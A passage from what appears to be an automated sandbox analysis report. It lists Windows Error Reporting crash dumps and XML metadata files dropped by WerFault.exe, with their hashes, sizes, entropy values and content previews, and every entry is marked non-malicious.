.F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.8.0.<./.P.i.

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERB551.tmp.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4720
                                  Entropy (8bit):4.491168039043668
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zsbJg77aI9HXiTpWpW8VYwYm8M4JIvHFf+q8vhXNj2NHQd:uIjf1I75XiTY7VoJMKRMNHQd
                                  MD5:F387E0004E23BE1401080E672E8F04EB
                                  SHA1:DF9FF115D0E2AE84EED5B46DA26FC865C110A859
                                  SHA-256:0278E8B3BE6E3364F30BED1EC615CA2791D9CC3D4946D2E35570A68BFDC3BE34
                                  SHA-512:BCA000430635BB611C4136E18ACDA714F60C7E36A63176FA29D09DF48F10AD451EDBFB9EC008842A0247202BC1A1C19931430259DC101F33E5B56B2B1E557E21
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534201" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERB8E8.tmp.dmp

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:18:23 2024, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):94564
                                  Entropy (8bit):1.7041614339149131
                                  Encrypted:false
                                  SSDEEP:384:QiU+SAEAwDzhiRMRJBD/7mVngqkZjo0K2H:QP+SAEVDtakD/7m5gjo0vH
                                  MD5:E59126080A8F1EC41C49AF5AD41420ED
                                  SHA1:6FA3A7C79A4CB5BDEDDC37A5A260AD27236808C5
                                  SHA-256:E3103E37A2483B5FE8430951C425B3958869BE29DFE562FBA9C70457BB342B4D
                                  SHA-512:5EA929FBB98EAB31E8F074AC3A522710ECB4300F396DB351B1161420B15A66119AB33CD6EE94093EE088DC3B0E2A1C456BA9DE3AEE05BA3195BBA3C2A9D31F5B
                                  Malicious:false
                                  Preview:MDMP..a..... ..........g............T...............\............6..........T.......8...........T............!..lO..........@...........,...............................................................................eJ..............GenuineIntel............T.......P......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERB986.tmp.WERInternalMetadata.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8440
                                  Entropy (8bit):3.6993833368152687
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJTM6u6YEIlSU2D8gmfI9GpBq89bPasfWdlm:R6lXJ46u6YEKSU2D8gmfGiP5fWe
                                  MD5:BA57184151A9682461AFFCE2FBF38A62
                                  SHA1:D64B2DDB82A80DE7F70C717B9E1E9BF0D40522AA
                                  SHA-256:7592499F54E09DFF331297E4EB2E4EC73BF19D48D5A158749F9543DF4DD332F6
                                  SHA-512:60B81F5B01443D6EF3AD0373779F4C09E699F3B59FF81A728D34852C67A954541E1EBBC6FF01257E7BCEA91233BDA7609FF169FECE33A34AFCF4A97196EC67BC
                                  Malicious:false
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.8.0.<./.P.i.

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERB9A6.tmp.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4720
                                  Entropy (8bit):4.490704094031481
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zsbJg77aI9HXiTpWpW8VYQYm8M4JIvHFbc+q8vhXNj2NHQd:uIjf1I75XiTY7V0J3KRMNHQd
                                  MD5:F51C1B5C6D5CFFF869AEEDA2540E9A45
                                  SHA1:29E501E683642F8024CEB255D60B77D857810C78
                                  SHA-256:49E1051AB44C66982156E1338E0531C7FE8C90E18B0454D200865BA54F11EB96
                                  SHA-512:CEB7071FE562AB9359FFC1FA85CECBBCB93604282473E7A61B8CC769F9F72AE6B0D36E91EC05EF27B145C4E1CFE3E7A3B89C23DC5A91759BE44D6BE47DD0E3B0
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534201" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERBB4A.tmp.dmp

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:18:24 2024, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):101954
                                  Entropy (8bit):1.6958269123877692
                                  Encrypted:false
                                  SSDEEP:384:NiuRR5AEFzhv4vcR5feD/KQVhhuNEhNH:/RR5AEFtvDeD/KQY6r
                                  MD5:292D6B2FFF29E81A0003E6B04B066CFB
                                  SHA1:C437472B18F3994B178B74F04A179870E2467CD0
                                  SHA-256:8FA8E6A46C43E52721104431CBE2040859A7E2CB4C4BD5356C8D79385C97350E
                                  SHA-512:297FD7E784EA71077C54283F47FB0D4999F7990E2E7D12AF38E5A65C4FAE5EE049C02ECB8BEE9E78D85BFF597485011B4F5B57BA0E9ECD52688CC9E30AD8D375
                                  Malicious:false
                                  Preview:MDMP..a..... ..........g........................(...............f;..........T.......8...........T............*..*d......................................................................................................eJ......8.......GenuineIntel............T.......P......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERBBC8.tmp.WERInternalMetadata.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8440
                                  Entropy (8bit):3.6996405877387124
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJTA66w6YEIZSUdDigmfI9GpB089bwasfXwm:R6lXJ06V6YE2SUdDigmfGAw5fl
                                  MD5:4DBE63912C81DFA1385C4A6A57617AD4
                                  SHA1:020569B26816BB5D059FDFD5CEBC978CA20DBFCF
                                  SHA-256:88A45393455BF3B921FB4BEA9FB3EF797303D9CE9E82280E2F53A4A12F9B64A5
                                  SHA-512:78E839B2922F9A6F9EAEBCA515FA1D1C85C0A7289EF7A4066F42BF5BCD75CF268C7603FDEA00DC52F343B5EC79BF5EFEDD4F57046E6810F2C68D8697A5E0E66B
                                  Malicious:false
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.8.0.<./.P.i.

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERBBE8.tmp.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4720
                                  Entropy (8bit):4.4920683854366885
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zsbJg77aI9HXiTpWpW8VYbYm8M4JIvHF7C+q8vhXNj2NHQd:uIjf1I75XiTY7VvJICKRMNHQd
                                  MD5:27643F9F54027B873B310B2375F48F8E
                                  SHA1:E5ED1E8EED9F9662045DF252FFA16E1C26766155
                                  SHA-256:89EAAD6546766FA9E128412BD6463431BCD87977B64A1EAC7A9A1F6FEBA23377
                                  SHA-512:81217B0B289791D69527195E2DF67544F63AB6F60F2D62EADA8BBEB18E592F04BBB5BCB7BDA61ABF928FF2521BA12075D6C73F4422D23373538293658FECB44E
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534201" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERBDAB.tmp.dmp

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:18:25 2024, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):114678
                                  Entropy (8bit):1.810685030670006
                                  Encrypted:false
                                  SSDEEP:384:8iykRnaAE0pudHz2M2/ID/KQV4BOwbMxSgrAYa1:VRaAE0pudHKxID/KQVOSShYS
                                  MD5:6435AB8840307F9CD081C97714C841C3
                                  SHA1:8C41A3B0344BB117E3DB8E502566D0A8ACAC7B0F
                                  SHA-256:7AD65632C889523F8A647FD6C947F48CF3650DA864A6BB5E3DC535F28992BAFA
                                  SHA-512:3CBC0CBB2FA40E34D594B7E089BB534B4F969389B0508DD7A2B82D21C56E52AC2C8930A91B5A93DC896CEB1CAD83EC207F94A48814DCB7C7DB0B5ED2AF1FE9C3
                                  Malicious:false
                                  Preview:MDMP..a..... ..........g........................................z@..........T.......8...........T...........X0..........................................................................................................eJ..............GenuineIntel............T.......P......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE39.tmp.WERInternalMetadata.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8440
                                  Entropy (8bit):3.701471180683204
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJTC6S6YEIRSUdDigmfI9GpBa89b5asfBLvzm:R6lXJ26S6YEeSUdDigmfGy55fBLy
                                  MD5:765E519F758789EF65BEF7FB03FAD9CC
                                  SHA1:380E9AD0757A9B5DFA011219C09358C286D07809
                                  SHA-256:7757D1344680486D26812393984B31C2740C2022F8CF608A9432778ED99D94E4
                                  SHA-512:DF588EF6A4806EAA8F7A727FD9A7ADF250CE83FFB10F3C71C755F0E70784B083A5D488B10AEFDFF53BDDD88066E63C083F0AFD07F8BB171ACA370F525A76353B
                                  Malicious:false
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.8.0.<./.P.i.

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE59.tmp.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4720
                                  Entropy (8bit):4.489632957800002
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zsbJg77aI9HXiTpWpW8VY/j0Ym8M4JIvHFPiF+q8vhXNj2NHQd:uIjf1I75XiTY7V4FJKiFKRMNHQd
                                  MD5:A4B647636525A91F96EC1205F34A5FA6
                                  SHA1:D427014238970BE29DC1F7EFCE895C17EED95288
                                  SHA-256:0288A537CA47AF8623E2E62E3081FF73CE71C05C3372159E3D8838F1200D2EFB
                                  SHA-512:05CD73C0BA77969F7B8819082E59C0936355EB7AB08111DF0C11DA62AE2AD5B45ABFA90913A26A60C5812D5ED97BE901F29ECA4473A490CF7E119F17CF6C1A07
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534201" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERC397.tmp.dmp

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:18:26 2024, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):117730
                                  Entropy (8bit):1.7250580002851033
                                  Encrypted:false
                                  SSDEEP:384:pbgktAEZ13z2GgycSuoYnT+Nxc4uZC1DgG6UY:lgcAEZhK/yPgTj4p156N
                                  MD5:B7D3AB97A6FA6931C7919CCD5B666126
                                  SHA1:44C620660AB371921F5784F6F02844F4D8874596
                                  SHA-256:46C9F99176D6304EECD6C9EFFAC9AE66CD87758F652AF3C1561CAC243C56F8E6
                                  SHA-512:06F0344FED515BB54E536CDF78945777779605B0A0497AB8A840DB95E6B01F85540B909C8E1AC935CB7EB81B0AC2E2EF947B28C7CF461E30E788127878ECA05D
                                  Malicious:false
                                  Preview:MDMP..a..... ..........g....................................d....E..........T.......8...........T............3.........................................................................................................eJ....... ......GenuineIntel............T.......P......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERC453.tmp.WERInternalMetadata.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8442
                                  Entropy (8bit):3.7009066823746997
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJTjkh6ZBKb6YEIYSUwDsgmfI9GpBO89biasf3dWm:R6lXJfY6Zcb6YEHSUwDsgmfGmi5fF
                                  MD5:FD2FBD4F5E61C9495EF0F01C79AD1D92
                                  SHA1:EAF739B0E7075ADCD3D94FA7F6BDDFE7706E67E5
                                  SHA-256:73B82DE25FA6E945CC541D1381077442C5B2D143493709C9991EC778533467C4
                                  SHA-512:3A7DC8B762637AF5E41B995B2CCDB26546C23157F27B056E9CE1CFDAEBB349C093FE5A93C2B75DA23B64E310CAE8EA952BBCBAF4575C2E3453BEE640779115E1
                                  Malicious:false
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.8.0.<./.P.i.

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERC474.tmp.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4720
                                  Entropy (8bit):4.489706820925829
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zsbJg77aI9HXiTpWpW8VYhYm8M4JIvHF42+q8vhXNj2NHQd:uIjf1I75XiTY7VZJuKRMNHQd
                                  MD5:1599CF98CD1AC8BB5B6D181D77AA20C8
                                  SHA1:434E8A81CBE2AABB3D4A67F2B89A9361CCA8DAFF
                                  SHA-256:EB03B25DDB7E7F01234EE8C4112AC3D0A99107BA48652C1D36D9201FC98F4A43
                                  SHA-512:13C109FF75190C21A89A2FDF49A45404D6C6DE6747DDD33CCB623440B68C6451A80AC9117CC8362AC91CAE1A6FA81275DCADE09A1FC08E17398989B997E9ED5C
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534201" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERCA8C.tmp.dmp

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:18:28 2024, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):60106
                                  Entropy (8bit):1.801363188309585
                                  Encrypted:false
                                  SSDEEP:192:xjr1FkT7XwmXOAOJwMAMCT+zPV04nMnHCbPy3jdata4l6v+g21/0:5hFkY7AEOT+k2yJattx71/0
                                  MD5:9556F20141DE600CDF788584DD4F922D
                                  SHA1:5AAFE18007C780862ADA94106225D375EE0C89C9
                                  SHA-256:BCA03FF3D9CE682F88A7D9DA957757F4A30A8DB653D05B351D05689E4EE54B68
                                  SHA-512:1F98F2429B46FF4E2DAC53474672899BDD2034537606C8091689109B624233BE5FBA8E06106FA60D35962D34F0A74084DB4B713635BCEA39AC8E83B8F11E9552
                                  Malicious:false
                                  Preview:MDMP..a..... ..........g............4...............<...........0*..........T.......8...........T...........`2..j...........X...........D...............................................................................eJ..............GenuineIntel............T.......P......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERCB77.tmp.WERInternalMetadata.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8338
                                  Entropy (8bit):3.698052462220816
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJTl6kKb6YEI/SUDDqgmfnhcA8pDRC89bMasfikm:R6lXJR6X6YEwSUDDqgmfWH7M5fw
                                  MD5:32B7D9450D0F897C23E306E0E4E502E9
                                  SHA1:A01D6537EC4A92E37416F6106A40312DCC9EC24F
                                  SHA-256:B99A138406A136FA4561D0045423C1D6B5094AB0EB58B15C6FA31A9287F4CE0A
                                  SHA-512:02132E9A60F55687AC06830CADC0EDFA36CEDCD50CA8BB91A17691758182BE4946DE2758367AA8266748C03EB6173BBAB44755FC90120166C20065106DE3E47E
                                  Malicious:false
